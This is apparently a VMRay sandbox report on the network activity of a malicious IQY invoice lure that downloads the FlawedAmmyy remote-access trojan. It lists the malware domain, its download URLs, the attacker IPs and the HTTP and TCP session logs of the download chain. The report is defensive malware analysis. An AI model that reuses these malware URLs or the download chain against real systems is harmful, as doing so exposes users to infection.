IQY File Downloads FlawedAmmyy RAT | Network

IQY File Downloads FlawedAmmyy RAT | Network

Try VMRay Analyzer

VTI SCORE: 100/100

Target:

Windows 7 (SP1, 64-bit), MS Office 2016 (64-bit) | ms_office

Classification:

Trojan, Dropper, Exploit, Downloader

ca0da220f7691059b3174b2de14bd41ddb96bf3f02a2824b2b8c103215c7403c (SHA256)

Sales invoice Z12_01 copy.iqy.iqy

Excel Document

Created at 2018-06-06 09:51:00

Notifications (2/2)

Code overwrite was observed during this analysis. Note that the analysis results may be affected by this modification by the sample.

The overall sleep time of all monitored processes was truncated from "3 minutes, 21 seconds" to "2 seconds" to reveal dormant functionality.

Connection Overview

Contacted Hosts (2)

»

Hostname	IP Address	Location	Protocols	Reputation Status	WHOIS Data
95.213.251.149, brembotembo.com	95.213.251.149	Russian Federation	HTTP, DNS, TCP	Has Blacklisted URL	Show WHOIS
-	185.222.202.139	Ukraine	TCP	Unknown	Not Queried

Contacted URLs (3)

»

URL	Categories	Names	HTTP Status Code	Reputation Status
http://brembotembo.com/load.dat	Malware	Mal/HTMLGen-A	-	Blacklisted
brembotembo.com/1.dat	Malware	Mal/HTMLGen-A	HTTP_STATUS_OK (200)	Blacklisted
brembotembo.com/doc.xls	Malware	Mal/HTMLGen-A	HTTP_STATUS_OK (200)	Blacklisted

Connections

DNS (1)

»

Operation	Additional Information	Success	Count	Logfile
Resolve Name	host = brembotembo.com, address_out = 95.213.251.149		1	Fn

TCP Sessions (1)

»

Information	Value
Total Data Sent	0.17 KB
Total Data Received	0.00 KB
Contacted Host Count	1
Contacted Hosts	185.222.202.139:80

TCP Session #1

»

Information	Value
Handle	0xf0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_IP
Remote Address	185.222.202.139
Remote Port	80
Local Address	0.0.0.0
Local Port	49167
Data Sent	0.17 KB
Data Received	0.00 KB

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 185.222.202.139, remote_port = 80		1	Fn
Send	flags = NO_FLAG_SET, size = 36, size_out = 36		1	Fn Data
Receive	flags = NO_FLAG_SET, size = 2, size_out = 2		1	Fn Data
Send	flags = NO_FLAG_SET, size = 131, size_out = 131		1	Fn Data
Send	flags = NO_FLAG_SET, size = 2, size_out = 2		1	Fn Data
Receive	flags = NO_FLAG_SET, size = 1, size_out = 1		1	Fn Data

HTTP Sessions (3)

»

Information	Value
Total Data Sent	0.29 KB
Total Data Received	424.80 KB
Contacted Host Count	1
Contacted Hosts	brembotembo.com

HTTP Session #1

»

Information	Value
Server Name	brembotembo.com
Server Port	80
Data Sent	0.07 KB
Data Received	0.55 KB

Operation	Additional Information	Success	Count	Logfile
Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS		1	Fn
Open Connection	protocol = http, server_name = brembotembo.com, server_port = 80		1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /1.dat		1	Fn
Send HTTP Request	headers = host: brembotembo.com, connection: Keep-Alive, url = brembotembo.com/1.dat		1	Fn Data
Read Response	size = 4096, size_out = 561		1	Fn Data

HTTP Session #2

»

Information	Value
Server Name	brembotembo.com
Server Port	80
Data Sent	0.05 KB
Data Received	174.25 KB

Operation	Additional Information	Success	Count	Logfile
Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS		1	Fn
Open Connection	protocol = http, server_name = brembotembo.com, server_port = 80		1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /doc.xls		1	Fn
Send HTTP Request	headers = host: brembotembo.com, url = brembotembo.com/doc.xls		1	Fn Data
Read Response	size = 4096, size_out = 1448		1	Fn Data
Read Response	size = 65536, size_out = 11584		1	Fn Data
Read Response	size = 65536, size_out = 65536		1	Fn Data
Read Response	size = 65536, size_out = 21584		1	Fn Data
Read Response	size = 65536, size_out = 63888		1	Fn Data
Read Response	size = 14395, size_out = 5808		1	Fn Data
Read Response	size = 8587, size_out = 1452		1	Fn Data
Read Response	size = 7135, size_out = 1452		1	Fn Data
Read Response	size = 5683, size_out = 5683		1	Fn Data

HTTP Session #3

»

Information	Value
Server Name	brembotembo.com
Server Port	80
Data Sent	0.17 KB
Data Received	250.00 KB

Operation	Additional Information	Success	Count	Logfile
Open Session	access_type = INTERNET_OPEN_TYPE_PRECONFIG		1	Fn
Open Connection	protocol = http, server_name = brembotembo.com, server_port = 80		1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /load.dat, flags = INTERNET_FLAG_RELOAD		1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://brembotembo.com/load.dat		1	Fn
Read Response	size = 1024, size_out = 1024		250	Fn Data

WHOIS Domain Information

Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Screenshot